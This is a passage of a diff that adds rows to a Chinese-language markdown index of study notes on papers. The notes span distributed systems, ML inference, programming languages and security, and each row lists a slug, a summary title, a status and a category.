用四个时间戳和一组滤波器,让全网服务器的钟差几毫秒](/study/papers/ntp-mills-1991/) | ✅ v3 | 分布式系统 | 共识与复制 | | `nuprl-1986` | [Nuprl — 第一个把 Martin-Löf 类型论搬上屏幕的证明助手](/study/papers/nuprl-1986/) | ✅ v3 | 形式化方法 | 形式化验证 | @@ -1927,11 +2068,14 @@ sidebar: | `nvm` | [nvm — 在同一台机器上轻松切换 Node 版本](/study/papers/nvm/) | ✅ v3 | 后端 API | 前端工具链 | | `nvme-protocol-2017` | [NVMe — 为 SSD 重写的存储协议](/study/papers/nvme-protocol-2017/) | ✅ v3 | 图形学 | GPU 架构 | | `oauth-2.1-rfc` | [OAuth 2.1 — 把十年 OAuth 实战经验收口成一份能直接用的规范](/study/papers/oauth-21-rfc/) | ✅ v3 | 后端 API | 后端 | +| `oauth2-rfc6749` | [OAuth 2.0 Authorization Framework (RFC 6749) — 不用把密码交给第三方,也能授权访问](/study/papers/oauth2-rfc6749/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `okapi-bm25-1994` | [Robertson-Walker 1994 — 把 2-Poisson 压成一行能算的公式](/study/papers/okapi-bm25-1994/) | ✅ v3 | 信息检索 | 检索与排序 | +| `oltp-looking-glass` | [OLTP Through the Looking Glass — 传统数据库的 20 倍开销从哪来](/study/papers/oltp-looking-glass/) | ✅ v3 | 数据库 | 存储与查询 | | `omagent-2024` | [OmAgent — 长视频分治 Agent 与回退检索](/study/papers/omagent-2024/) | ✅ v3 | 机器学习 | 视频理解 | | `omega-2013` | [Omega 2013 — 让多个调度器同时改一份 cluster 状态](/study/papers/omega-2013/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `omnidirectional-mllm-2025` | [全景空间推理 — MLLM 准备好面对 360° 了吗](/study/papers/omnidirectional-mllm-2025/) | ✅ v3 | 机器学习 | 视频理解 | | `omnistvg-2025` | [OmniSTVG — 按句子把视频里所有相关物体都框出来](/study/papers/omnistvg-2025/) | ✅ v3 | 机器学习 | 视频理解 | +| `on-demand-container-loading` | [On-demand Container Loading — Lambda 如何在 10GiB 镜像下保持冷启动](/study/papers/on-demand-container-loading/) | ✅ v3 | 分布式系统 | 共识与复制 | | `opencl-2010` | [OpenCL 2010 — 一份代码同时跑 CPU/GPU/DSP/FPGA 的开放标准](/study/papers/opencl-2010/) | ✅ v3 | 图形学 | GPU 架构 | | `openflow-2008` | [OpenFlow 2008 — 把交换机的『分拣规则』搬到一台中央电脑上](/study/papers/openflow-2008/) | ✅ v3 | 网络协议 | 网络协议 | | `openhands` | [OpenHands — 开源 AI 软件工程师](/study/papers/openhands/) | ✅ v3 | 机器学习 | 智能体与 LLM | @@ -1939,10 +2083,12 @@ sidebar: | `optuna` | [Optuna — 让超参搜索像写普通 Python 代码一样自然](/study/papers/optuna/) | ✅ v3 | 机器学习 | 机器学习 / 超参优化 | | `orca-2022` | [Orca — Transformer 生成模型的分布式推理调度](/study/papers/orca-2022/) | ✅ v3 | 图形学 | GPU 架构 | | `orca-continuous-batching` | [Orca — 让一批 LLM 请求随到随走,不再排队等最长那个](/study/papers/orca-continuous-batching/) | ✅ v3 | 机器学习 | 模型与训练 | +| `oscar-int2-kv` | [OSCAR — 面向 2-bit KV Cache 的离线谱协方差感知旋转](/study/papers/oscar-int2-kv/) | ✅ v3 | 机器学习 | 模型与训练 | | `ot-1989` | [OT — 多人同时改一份文档,操作随上下文自动改坐标](/study/papers/ot-1989/) | ✅ v3 | 分布式系统 | 共识与复制 | | `owens-2007-gpgpu-survey` | [Owens 2007 GPGPU 综述 — CUDA 之前 GPU 通用计算的黑魔法时代](/study/papers/owens-2007-gpgpu-survey/) | ✅ v3 | 图形学 | 渲染与图形 | | `p4-2014` | [P4 — 让交换机的转发逻辑像写代码一样改](/study/papers/p4-2014/) | ✅ v3 | 网络协议 | 网络协议 | | `padmanabhan-1995-http-latency` | [Padmanabhan-Mogul 1995 — 把 HTTP 三种提速方案放一起跑,看谁真的快](/study/papers/padmanabhan-1995-http-latency/) | ✅ v3 | 网络协议 | 网络协议 | +| `paged-attention-vllm` | [PagedAttention 与 vLLM — 零基础学习笔记](/study/papers/paged-attention-vllm/) | ✅ v3 | 机器学习 | ML 系统 | | `pagerank-1998` | [PageRank — 用随机游走给整个网络的页面打分](/study/papers/pagerank-1998/) | ✅ v3 | 信息检索 | 检索与排序 | | `pair-programming` | [Pair Programming — 两个人共用一台机器写代码](/study/papers/pair-programming/) | ✅ v3 | 其他 | 软件工程 | | `panel` | [Panel — 把 notebook 一键变交互式 web app](/study/papers/panel/) | ✅ v3 | 数据可视化 | 数据可视化 | @@ -1978,16 +2124,19 @@ sidebar: | `product-quantization-2011` | [Product Quantization — 把向量切碎再压成几个字节](/study/papers/product-quantization-2011/) | ✅ v3 | 数据库 | 存储与查询 | | `program-comprehension-fmri` | [Program Comprehension fMRI — 程序员读代码时大脑亮的是语言区不是数学区](/study/papers/program-comprehension-fmri/) | ✅ v3 | 其他 | 软件工程认知科学 | | `programmer-interruption` | [Programmer Interruption — IDE 数据告诉你被打断后多久才能继续敲代码](/study/papers/programmer-interruption/) | ✅ v3 | 其他 | 软件工程 | +| `projection-bench` | [ProjectionBench — 渐进披露下,LLM 能「猜对」科学结论吗?](/study/papers/projection-bench/) | ✅ v3 | 机器学习 | 模型与训练 | | `prolog-colmerauer` | [Prolog 的诞生 — 让逻辑式子直接当程序跑](/study/papers/prolog-colmerauer/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `prototypical-networks-2017` | [Prototypical Networks — 每类算个均值,比距离就够了](/study/papers/prototypical-networks-2017/) | ✅ v3 | 机器学习 | 模型与训练 | | `proverif-2001` | [ProVerif — 把密码协议翻成 Prolog 规则让计算机自己证安全](/study/papers/proverif-2001/) | ✅ v3 | 形式化方法 | 形式化验证 | | `ps-li-2014` | [Parameter Server — 多机训练前 AllReduce 时代的工业标准](/study/papers/ps-li-2014/) | ✅ v3 | 分布式系统 | 共识与复制 | | `push-pull-frp` | [Push-Pull FRP — Functional Reactive Programming 实用化](/study/papers/push-pull-frp/) | ✅ v3 | 编程语言 | 编程语言 | | `pypy-tracing-jit` | [PyPy meta-tracing JIT — 给解释器加一次 JIT,所有用它的语言一起加速](/study/papers/pypy-tracing-jit/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | +| `qserve-w4a8kv4-2024` | [QServe — W4A8KV4 量化与系统协同设计(零基础学习笔记)](/study/papers/qserve-w4a8kv4-2024/) | ✅ v3 | 机器学习 | ML 系统 | | `quantum-supremacy-2019` | [Quantum Supremacy 2019 — 量子机用 200 秒做完超算 1 万年的事](/study/papers/quantum-supremacy-2019/) | ✅ v3 | 图形学 | GPU 架构 | | `quic` | [QUIC — 把可靠传输从内核搬到用户空间](/study/papers/quic/) | ✅ v3 | 网络协议 | 计算机网络 | | `quincy-2009` | [Quincy — 把"派活给机器"变成一道最小费用流题](/study/papers/quincy-2009/) | ✅ v3 | 分布式系统 | 共识与复制 | | `qvhighlights-2021` | [QVHighlights — 用自然语言查询在视频里找精彩瞬间](/study/papers/qvhighlights-2021/) | ✅ v3 | 机器学习 | 视频理解 | +| `qwen-vla` | [Qwen-VLA — 跨任务、环境与具身的统一视觉-语言-动作建模](/study/papers/qwen-vla/) | ✅ v3 | 机器学习 | 模型与训练 | | `qwen2-5-vl-2025` | [Qwen2.5-VL — 绝对时间编码 + 动态分辨率,小时级视频原生理解](/study/papers/qwen2-5-vl-2025/) | ✅ v3 | 机器学习 | 视频理解 | | `qwen2-vl-2024` | [Qwen2-VL — 动态分辨率 + M-RoPE,工业级视频理解的里程碑](/study/papers/qwen2-vl-2024/) | ✅ v3 | 机器学习 | 视频理解 | | `r-bgp-2007` | [R-BGP 2007 — 故障切换前先把备份路径塞进邻居口袋](/study/papers/r-bgp-2007/) | ✅ v3 | 网络协议 | 网络协议 | @@ -1995,6 +2144,7 @@ sidebar: | `raft` | [Raft — 易理解的共识算法](/study/papers/raft/) | 🗄 存量 | 分布式系统 | 分布式系统 | | `rag-lewis-2020` | [RAG (Lewis 2020) — 检索增强生成奠基](/study/papers/rag-lewis-2020/) | ✅ v3 | 机器学习 | AI / NLP | | `ranknet-2005` | [RankNet — 让搜索引擎学会比较两个结果谁更好](/study/papers/ranknet-2005/) | ✅ v3 | 信息检索 | 检索与排序 | +| `ray-2018` | [Ray — 面向新兴 AI 应用的分布式框架](/study/papers/ray-2018/) | ✅ v3 | 分布式系统 | 共识与复制 | | `rcu-2001` | [RCU 2001 — 让"读"的代价归零的并发数据结构](/study/papers/rcu-2001/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `react` | [ReAct — Reasoning and Acting](/study/papers/react/) | ✅ v3 | 机器学习 | 智能体与 LLM | | `react-server-components` | [React Server Components — 让组件自己决定在哪台机器跑](/study/papers/react-server-components/) | ✅ v3 | 后端 API | 前端框架 | @@ -2006,14 +2156,17 @@ sidebar: | `reflexion` | [Reflexion — 让 LLM 自我反思](/study/papers/reflexion/) | ✅ v3 | 机器学习 | 智能体与 LLM | | `reformer-2020` | [Reformer — 用哈希分桶把 attention 从 O(L²) 压到 O(L log L)](/study/papers/reformer-2020/) | ✅ v3 | 机器学习 | 模型与训练 | | `regev-lwe-2005` | [On Lattices, Learning with Errors, Random Linear Codes, and Cryptography](/study/papers/regev-lwe-2005/) | ✅ v3 | 安全与隐私 | 安全与隐私 | +| `rendering-diffs` | [On Rendering Diffs — 浏览器里渲染代码 diff 为何比看起来难得多](/study/papers/rendering-diffs/) | ✅ v3 | CLI | 编辑器与 IDE | | `replug-2023` | [REPLUG — 不动 LLM 一根毛,只把检索器调到它的"口味"上](/study/papers/replug-2023/) | ✅ v3 | 机器学习 | 模型与训练 | | `reps-ifds` | [Reps-Horwitz-Sagiv IFDS — 把跨过程分析变成图上找路](/study/papers/reps-ifds/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `resnet` | [ResNet — 残差连接](/study/papers/resnet/) | ✅ v3 | 机器学习 | 计算机视觉 / 深度学习 | +| `resolution-diagnostics-llm` | [Resolution Diagnostics for Paired LLM Evaluation — 排行榜上的 0.8 分差距能信吗?](/study/papers/resolution-diagnostics-llm/) | ✅ v3 | 机器学习 | 模型与训练 | | `rest-fielding-2000` | [REST — Fielding 2000 给 Web API 写下的设计宪法](/study/papers/rest-fielding-2000/) | ✅ v3 | 后端 API | 后端 | | `retro` | [RETRO — DeepMind 的检索增强 LLM](/study/papers/retro/) | ✅ v3 | 机器学习 | AI / NLP | | `reynolds-definitional-interpreters` | [Reynolds Definitional Interpreters — 用一种语言去定义另一种语言](/study/papers/reynolds-definitional-interpreters/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `reynolds-separation-logic` | [Separation Logic — 把 Hoare 逻辑扩到带指针的程序](/study/papers/reynolds-separation-logic/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `rfc-3833-dns-threats` | [RFC 3833 — IETF 第一次正式承认 DNS 不安全](/study/papers/rfc-3833-dns-threats/) | ✅ v3 | 网络协议 | 网络协议 | +| `rim-latent-reasoning` | [Reasoning in Memory — 解锁 LLM 的工作记忆做隐式推理](/study/papers/rim-latent-reasoning/) | ✅ v3 | 机器学习 | 模型与训练 | | `ring-allreduce-2017` | [Ring All-Reduce — 把 HPC 的环形规约搬进深度学习](/study/papers/ring-allreduce-2017/) | ✅ v3 | 图形学 | GPU 架构 | | `risc-i-1981` | [RISC I — 砍掉 90% 指令反而让 CPU 跑得更快](/study/papers/risc-i-1981/) | ✅ v3 | 图形学 | GPU 架构 | | `rlhf-christiano` | [RLHF Christiano 2017 — 人类偏好做奖励](/study/papers/rlhf-christiano/) | ✅ v3 | 机器学习 | 强化学习 / AI 安全 | @@ -2024,8 +2177,10 @@ sidebar: | `rocksdb-lsm` | [LSM-tree 与 RocksDB — 把所有写都变成顺序写](/study/papers/rocksdb-lsm/) | ✅ v3 | 数据库 | 数据库 | | `ron-2001` | [RON 2001 — 让一小撮节点自己绕开 BGP 故障](/study/papers/ron-2001/) | ✅ v3 | 网络协议 | 网络协议 | | `row-polymorphism-remy` | [Row Polymorphism — 让记录类型可扩展又不丢类型安全](/study/papers/row-polymorphism-remy/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | +| `rowhammer-2014` | [Row Hammer — 不碰邻居也能把邻居的位翻过来](/study/papers/rowhammer-2014/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `rrf-cormack-2009` | [RRF — 把多个搜索结果列表合并成一个的最简单办法](/study/papers/rrf-cormack-2009/) | ✅ v3 | 信息检索 | 数据检索 | | `rsa` | [RSA 公钥密码](/study/papers/rsa/) | ✅ v3 | 安全与隐私 | 密码学 | +| `rsa-1978` | [RSA 1978 — 数字签名与公钥密码的奠基论文](/study/papers/rsa-1978/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `rtp-rfc-1889` | [RTP RFC 1889 — 让 UDP 也能跑实时音视频](/study/papers/rtp-rfc-1889/) | ✅ v3 | 网络协议 | 网络协议 | | `rwkv-2023` | [RWKV — 让 RNN 拿到 Transformer 那张训练并行的入场券](/study/papers/rwkv-2023/) | ✅ v3 | 机器学习 | 模型与训练 | | `sac-2018` | [Soft Actor-Critic — 让强化学习既会拿分又愿意多试](/study/papers/sac-2018/) | ✅ v3 | 机器学习 | 模型与训练 | @@ -2063,6 +2218,7 @@ sidebar: | `sequential-consistency-1979` | [Sequential Consistency 1979 — 多处理器内存模型的第一个正确性标准](/study/papers/sequential-consistency-1979/) | ✅ v3 | 分布式系统 | 共识与复制 | | `server-sent-events` | [Server-Sent Events — 服务器单向推送的标准协议](/study/papers/server-sent-events/) | ✅ v3 | 后端 API | 前端 | | `sglang-2024` | [SGLang — 把 LLM 程序当成共享前缀的树来跑](/study/papers/sglang-2024/) | ✅ v3 | 图形学 | GPU 架构 | +| `sglang-radixattention` | [SGLang — 结构化语言模型程序的高效执行(RadixAttention 零基础笔记)](/study/papers/sglang-radixattention/) | ✅ v3 | 机器学习 | ML 系统 | | `sgx-2013` | [Innovative Instructions and Software Model for Isolated Execution](/study/papers/sgx-2013/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `shannon-1948` | [Shannon 1948 — 信息论的诞生](/study/papers/shannon-1948/) | ✅ v3 | 机器学习 | 信息论 | | `sharegpt4video-2024` | [ShareGPT4Video — 用 GPT-4V 级密集字幕,喂饱视频理解与生成](/study/papers/sharegpt4video-2024/) | ✅ v3 | 机器学习 | 视频理解 | @@ -2070,6 +2226,8 @@ sidebar: | `shenango-2019` | [Shenango — 每 5 微秒重新分一次核的中央调度器](/study/papers/shenango-2019/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `shokri-mia-2017` | [MIA 成员推断攻击 — 黑盒 API 能猜出你是不是训练数据](/study/papers/shokri-mia-2017/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `siglip-2023` | [SigLIP — 用 Sigmoid 损失训练图文对齐](/study/papers/siglip-2023/) | ✅ v3 | 机器学习 | 多模态 LLM | +| `signal-double-ratchet-2016` | [Double Ratchet Algorithm — Signal 端到端加密会话的「双棘轮」](/study/papers/signal-double-ratchet-2016/) | ✅ v3 | 安全与隐私 | 安全与隐私 | +| `sigstore-cosign-2022` | [Sigstore — 让每个人都能给软件「盖公证章」](/study/papers/sigstore-cosign-2022/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `sillito-questions` | [Sillito 44 问题 — 程序员改代码时到底在问什么](/study/papers/sillito-questions/) | ✅ v3 | 其他 | 软件工程 | | `silt-2011` | [SILT — 0.7 字节内存索引一条记录的 flash 键值存储](/study/papers/silt-2011/) | ✅ v3 | 数据库 | 存储与查询 | | `simhash-charikar-2002` | [SimHash — 用随机超平面把余弦相似度变成汉明距离](/study/papers/simhash-charikar-2002/) | ✅ v3 | 信息检索 | 检索与排序 | @@ -2097,6 +2255,7 @@ sidebar: | `sophia-2023` | [Sophia — 让二阶优化器第一次在 LLM 预训练里跑得动](/study/papers/sophia-2023/) | ✅ v3 | 机器学习 | 模型与训练 | | `sorkine-2004-laplacian-editing` | [Sorkine 2004 — 用拉普拉斯坐标编辑网格,拽把手不丢细节](/study/papers/sorkine-2004-laplacian-editing/) | ✅ v3 | 图形学 | 渲染与图形 | | `souffle-datalog` | [Soufflé — 把 Datalog 编译成 C++ 让程序分析跑得动](/study/papers/souffle-datalog/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | +| `soundness-bench` | [SoundnessBench — AI 科学家能分清好想法与烂想法吗?](/study/papers/soundness-bench/) | ✅ v3 | 机器学习 | 模型与训练 | | `spacevllm-2025` | [SpaceVLLM — 一个 MLLM 同时做时序定位、图像指代与时空管定位](/study/papers/spacevllm-2025/) | ✅ v3 | 机器学习 | 视频理解 | | `spann-2021` | [SPANN — 内存放中心、SSD 放向量的十亿级近邻检索](/study/papers/spann-2021/) | ✅ v3 | 信息检索 | 检索与排序 | | `spanner` | [Spanner — 全球分布式 SQL 数据库](/study/papers/spanner/) | ✅ v3 | 分布式系统 | 分布式系统 / 数据库 | @@ -2104,10 +2263,14 @@ sidebar: | `sparrow-2013` | [Sparrow — 让毫秒级任务也能被精准调度的去中心化调度器](/study/papers/sparrow-2013/) | ✅ v3 | 分布式系统 | 共识与复制 | | `sparse-autoencoders` | [Sparse Autoencoders — 把 superposition 解出来](/study/papers/sparse-autoencoders/) | 🗄 存量 | 机器学习 | AI 可解释性 | | `sparsegpt-2023` | [SparseGPT — 175B 大模型一次过剪 50%,不重训](/study/papers/sparsegpt-2023/) | ✅ v3 | 图形学 | GPU 架构 | +| `spec-agent-separation-logic` | [Spec-Agent — 用 Agent + 分离逻辑 + Fuzz 自动写 C++ 合约](/study/papers/spec-agent-separation-logic/) | ✅ v3 | 形式化方法 | 形式化验证 | | `specinfer-2023` | [SpecInfer — 让大模型一次"猜一棵树"再并行验证](/study/papers/specinfer-2023/) | ✅ v3 | 图形学 | GPU 架构 | +| `spectre-attack-2018` | [Spectre Attacks — 推测执行如何绕过边界检查偷读内存](/study/papers/spectre-attack-2018/) | ✅ v3 | 安全与隐私 | 安全与隐私 | +| `speculative-decoding-leviathan-2023` | [Speculative Decoding — 用小模型「猜」、大模型「验」,无损加速 Transformer 推理](/study/papers/speculative-decoding-leviathan-2023/) | ✅ v3 | 机器学习 | ML 系统 | | `splade-2021` | [SPLADE — 让神经网络学出稀疏向量,直接复用倒排索引](/study/papers/splade-2021/) | ✅ v3 | 信息检索 | 检索与排序 | | `sprite-1988` | [Sprite 1988 — 把一屋子工作站伪装成一台大主机](/study/papers/sprite-1988/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `sqlite-2022` | [SQLite — 嵌入式数据库 30 年怎么活下来的](/study/papers/sqlite-2022/) | ✅ v3 | 数据库 | 存储与查询 | +| `sqlite-durable-workflows` | [SQLite is All You Need for Durable Workflows — 用单文件数据库做持久化工作流](/study/papers/sqlite-durable-workflows/) | ✅ v3 | 数据库 | 存储与查询 | | `ssa` | [SSA — 静态单赋值形式](/study/papers/ssa/) | 🗄 存量 | 编译器 | 编译器 | | `st-llm-2024` | [ST-LLM — 把所有时空 token 交给 LLM,让它自己学时序](/study/papers/st-llm-2024/) | ✅ v3 | 机器学习 | 视频理解 | | `stable-diffusion` | [Stable Diffusion — 开源文生图引爆](/study/papers/stable-diffusion/) | ✅ v3 | 机器学习 | 生成模型 | @@ -2119,6 +2282,7 @@ sidebar: | `steensgaard-pointer` | [Steensgaard 指针分析 — 用等价合并把指针分析压到几乎线性](/study/papers/steensgaard-pointer/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `stm-shavit-touitou` | [STM Shavit-Touitou — 把"加锁"改成"事务"的源头](/study/papers/stm-shavit-touitou/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `stonebraker-2010-sqlnosql` | [Stonebraker 2010 SQL vs NoSQL — 慢的是老实现,不是 SQL](/study/papers/stonebraker-2010-sqlnosql/) | ✅ v3 | 数据库 | 存储与查询 | +| `storm-multi-agent-state` | [STORM — 面向多智能体协作的状态导向管理](/study/papers/storm-multi-agent-state/) | ✅ v3 | 机器学习 | 模型与训练 | | `streamingbench-2024` | [StreamingBench — 流式视频理解的 18 任务在线大考](/study/papers/streamingbench-2024/) | ✅ v3 | 机器学习 | 视频理解 | | `strongtalk` | [Strongtalk — 可以装可以卸的 Smalltalk 类型系统](/study/papers/strongtalk/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `stylegan2-2020` | [StyleGAN2 — 把 StyleGAN 的水滴瑕疵和潜空间纠葛一起修掉](/study/papers/stylegan2-2020/) | ✅ v3 | 机器学习 | 模型与训练 | @@ -2149,6 +2313,7 @@ sidebar: | `tendermint-2016` | [Tendermint — 把拜占庭共识塞进开放区块链的工程模板](/study/papers/tendermint-2016/) | ✅ v3 | 分布式系统 | 共识与复制 | | `tensorflow-osdi-2016` | [TensorFlow — 把神经网络拆成数据流图再跑到任何机器上](/study/papers/tensorflow-osdi-2016/) | ✅ v3 | 分布式系统 | 共识与复制 | | `tensorrt-llm-2023` | [TensorRT-LLM — NVIDIA 把 FT 升级成可调度的官方推理栈](/study/papers/tensorrt-llm-2023/) | ✅ v3 | 图形学 | GPU 架构 | +| `tensorrt-llm-overview` | [TensorRT-LLM — NVIDIA 开源 LLM 推理优化库零基础笔记](/study/papers/tensorrt-llm-overview/) | ✅ v3 | 机器学习 | ML 系统 | | `tesla-architecture-2008` | [NVIDIA Tesla — 把显卡改造成通用并行计算机](/study/papers/tesla-architecture-2008/) | ✅ v3 | 图形学 | GPU 架构 | | `the-os-1968` | [THE 1968 — Dijkstra 用分层 + 信号量造出第一个可证明的 OS](/study/papers/the-os-1968/) | ✅ v3 | 操作系统 | 内核与虚拟化 | | `theorems-for-free` | [Theorems for Free — 类型签名直接给定理](/study/papers/theorems-for-free/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | @@ -2159,6 +2324,7 @@ sidebar: | `timelinejs` | [TimelineJS — 一张 Google Sheet 直接变成交互时间轴](/study/papers/timelinejs/) | ✅ v3 | 基础设施 | 基础设施 | | `timemarker-2024` | [TimeMarker — 时间分隔符 + 任意长度采帧的视频定位大模型](/study/papers/timemarker-2024/) | ✅ v3 | 机器学习 | 视频理解 | | `tla-yu-tlc-1999` | [TLC — 让 TLA+ 规范可以一键机检的模型检查器](/study/papers/tla-yu-tlc-1999/) | ✅ v3 | 形式化方法 | 形式化验证 | +| `tls-1-3-rfc8446` | [TLS 1.3 (RFC 8446) — 更快、更简、默认前向保密的 HTTPS 握手](/study/papers/tls-1-3-rfc8446/) | ✅ v3 | 安全与隐私 | 安全与隐私 | | `tls-1.3` | [TLS 1.3 — 把 HTTPS 握手砍到一个来回](/study/papers/tls-13/) | ✅ v3 | 网络协议 | 网络协议 | | `tofte-talpin-regions` | [Tofte-Talpin Regions — 让类型系统替你管内存生命周期](/study/papers/tofte-talpin-regions/) | ✅ v3 | 编程语言 | 编程语言 | | `token-bucket-stripe` | [Stripe Rate Limiters — 工业级令牌桶长什么样](/study/papers/token-bucket-stripe/) | ✅ v3 | 后端 API | 后端工程 | @@ -2172,14 +2338,18 @@ sidebar: | `transformer-xl-2019` | [Transformer-XL — 让 Transformer 像 RNN 那样把上下文滚动传下去](/study/papers/transformer-xl-2019/) | ✅ v3 | 机器学习 | 模型与训练 | | `traveler-2024` | [TraveLER — 四段式多 Agent,帧级问答看懂长视频](/study/papers/traveler-2024/) | ✅ v3 | 机器学习 | 视频理解 | | `tree-of-thoughts-2023` | [Tree of Thoughts — 让 LLM 像下棋一样多想几步再答](/study/papers/tree-of-thoughts-2023/) | ✅ v3 | 机器学习 | 模型与训练 | +| `tree-sitter-2018` | [Tree-sitter — 增量式解析系统](/study/papers/tree-sitter-2018/) | ✅ v3 | CLI | 编辑器与 IDE | | `trees-that-grow` | [Trees that Grow — 可扩展的语法树设计](/study/papers/trees-that-grow/) | ✅ v3 | 编程语言 | 编程语言 | +| `triaxialkv` | [TriAxialKV — Agent 推理场景下的极低精度 KV Cache 混合量化](/study/papers/triaxialkv/) | ✅ v3 | 机器学习 | 模型与训练 | | `trill-2014` | [Trill — 一个引擎同时跑流、批、交互三种分析](/study/papers/trill-2014/) | ✅ v3 | 数据库 | 存储与查询 | | `triton-2019` | [Triton 2019 — 让 Python 写出贴近 cuBLAS 的 GPU kernel](/study/papers/triton-2019/) | ✅ v3 | 图形学 | GPU 架构 | +| `triton-anatomy-paged-attn` | [The Anatomy of a Triton Attention Kernel — 零基础学习笔记](/study/papers/triton-anatomy-paged-attn/) | ✅ v3 | 机器学习 | ML 系统 | | `triton-llm` | [Triton — 让 Python 程序员也能写出贴近 cuBLAS 的 GPU kernel](/study/papers/triton-llm/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `trustrank-2004` | [TrustRank — 用一小撮可信种子把整张 Web 的信誉算出来](/study/papers/trustrank-2004/) | ✅ v3 | 信息检索 | 检索与排序 | | `turchin-supercompilation` | [Turchin Supercompilation — 让编译器把程序模拟一遍再写回去](/study/papers/turchin-supercompilation/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `turing-1936` | [Turing 1936 可计算性](/study/papers/turing-1936/) | ✅ v3 | 编程语言 | 计算理论 | | `turing-architecture-2018` | [NVIDIA Turing — RT Core 把光追装进消费卡,Tensor Core 第二代下放 INT8](/study/papers/turing-architecture-2018/) | ✅ v3 | 图形学 | GPU 架构 | +| `tutti-ssd-kv-cache` | [Tutti — 让 SSD 上的 KV Cache 真正可用于长上下文 LLM 推理](/study/papers/tutti-ssd-kv-cache/) | ✅ v3 | 机器学习 | 模型与训练 | | `tvm` | [TVM — 让一份模型能在所有硬件上跑得快](/study/papers/tvm/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | | `tvm-2018` | [TVM OSDI 2018 — 把 Halide 思想搬到深度学习](/study/papers/tvm-2018/) | ✅ v3 | 图形学 | GPU 架构 | | `twine-2020` | [Twine — Facebook 把整个数据中心当一台机器调度](/study/papers/twine-2020/) | ✅ v3 | 操作系统 | 内核与虚拟化 | @@ -2195,9 +2365,13 @@ sidebar: | `veach-1997-mlt` | [Veach MLT — 用 Metropolis 在路径空间游走,专攻 BDPT 也算不动的难场景](/study/papers/veach-1997-mlt/) | ✅ v3 | 图形学 | 渲染与图形 | | `vega-lite` | [Vega-Lite — 用 JSON 三段式画复合图](/study/papers/vega-lite/) | ✅ v3 | 数据可视化 | 数据可视化 | | `vellvm` | [Vellvm — 在 Coq 里给 LLVM IR 写一份机器证明的语义](/study/papers/vellvm/) | ✅ v3 | 编程语言 | 类型与 PL 理论 | +| `velox-meta-2022` | [Velox — Meta 的统一执行引擎](/study/papers/velox-meta-2022/) | ✅ v3 | 数据库 | 存储与查询 | | `verdi-2015` | [Verdi — 在 Coq 里完整证明 Raft 协议的分布式系统验证框架](/study/papers/verdi-2015/) | ✅ v3 | 形式化方法 | 形式化验证 | +| `vericache` | [VeriCache — 把有损 KV Cache 变成无损 LLM 推理](/study/papers/vericache/) | ✅ v3 | 机器学习 | 模型与训练 | | `verisoft-2008` | [Verisoft — 把整台计算机从晶体管到邮件客户端全部用数学证完](/study/papers/verisoft-2008/) | ✅ v3 | 形式化方法 | 形式化验证 | | `vertica-2012` | [Vertica 2012 — C-Store 论文走向产品的七年改造账](/study/papers/vertica-2012/) | ✅ v3 | 数据库 | 存储与查询 | +| `vescale-fsdp-2026` | [veScale-FSDP — 灵活且高性能的大规模 FSDP](/study/papers/vescale-fsdp-2026/) | ✅ v3 | 机器学习 | ML 系统 | +| `vibeserve` | [VibeServe — 零基础学习笔记](/study/papers/vibeserve/) | ✅ v3 | 机器学习 | 模型与训练 | | `vid-llm-survey-2023` | [Vid-LLM Survey — 用大语言模型理解视频的全景地图](/study/papers/vid-llm-survey-2023/) | ✅ v3 | 机器学习 | 视频理解 | | `video-chatgpt-2023` | [Video-ChatGPT — 让大语言模型看懂视频并聊起来](/study/papers/video-chatgpt-2023/) | ✅ v3 | 机器学习 | 视频理解 | | `video-llama-2023` | [Video-LLaMA — 把音频和视频同时塞进大语言模型](/study/papers/video-llama-2023/) | ✅ v3 | 机器学习 | 视频理解 | @@ -2213,6 +2387,7 @@ sidebar: | `videoprism-2024` | [VideoPrism — 冻结一个模型就能搞定所有视频理解任务](/study/papers/videoprism-2024/) | ✅ v3 | 机器学习 | 视频理解 | | `vidstg-2020` | [VidSTG — 用自然语言在长视频里框出「谁在何时何地」](/study/papers/vidstg-2020/) | ✅ v3 | 机器学习 | 视频理解 | | `vinoground-2024` | [Vinoground — 时序反事实短视频探针](/study/papers/vinoground-2024/) | ✅ v3 | 机器学习 | 视频理解 | +| `visualthink-vla` | [VisualThink-VLA — 用「视觉中间推理」做低延迟的机器人策略](/study/papers/visualthink-vla/) | ✅ v3 | 机器学习 | 模型与训练 | | `vit` | [ViT — Vision Transformer](/study/papers/vit/) | ✅ v3 | 机器学习 | 计算机视觉 | | `vl2-2009` | [VL2 — 让一万台服务器像在同一台交换机上](/study/papers/vl2-2009/) | ✅ v3 | 网络协议 | 网络协议 | | `vllm` | [vLLM — 把操作系统的分页搬进 GPU KV cache](/study/papers/vllm/) | ✅ v3 | 机器学习 | 数据科学与 AI | @@ -2234,6 +2409,8 @@ sidebar: | `wandb` | [Weights & Biases — 几行 init 把指标系统代码自动入库](/study/papers/wandb/) | ✅ v3 | 基础设施 | 基础设施 | | `wang-2014-spdy` | [How Speedy is SPDY — 换协议没让网页变快多少](/study/papers/wang-2014-spdy/) | ✅ v3 | 网络协议 | 网络协议 | | `ward-1992` | [Ward 1992 — 第一个能落地的各向异性反射模型](/study/papers/ward-1992/) | ✅ v3 | 图形学 | 渲染与图形 | +| `wco-joins-relational-2020` | [Adopting Worst-Case Optimal Joins in 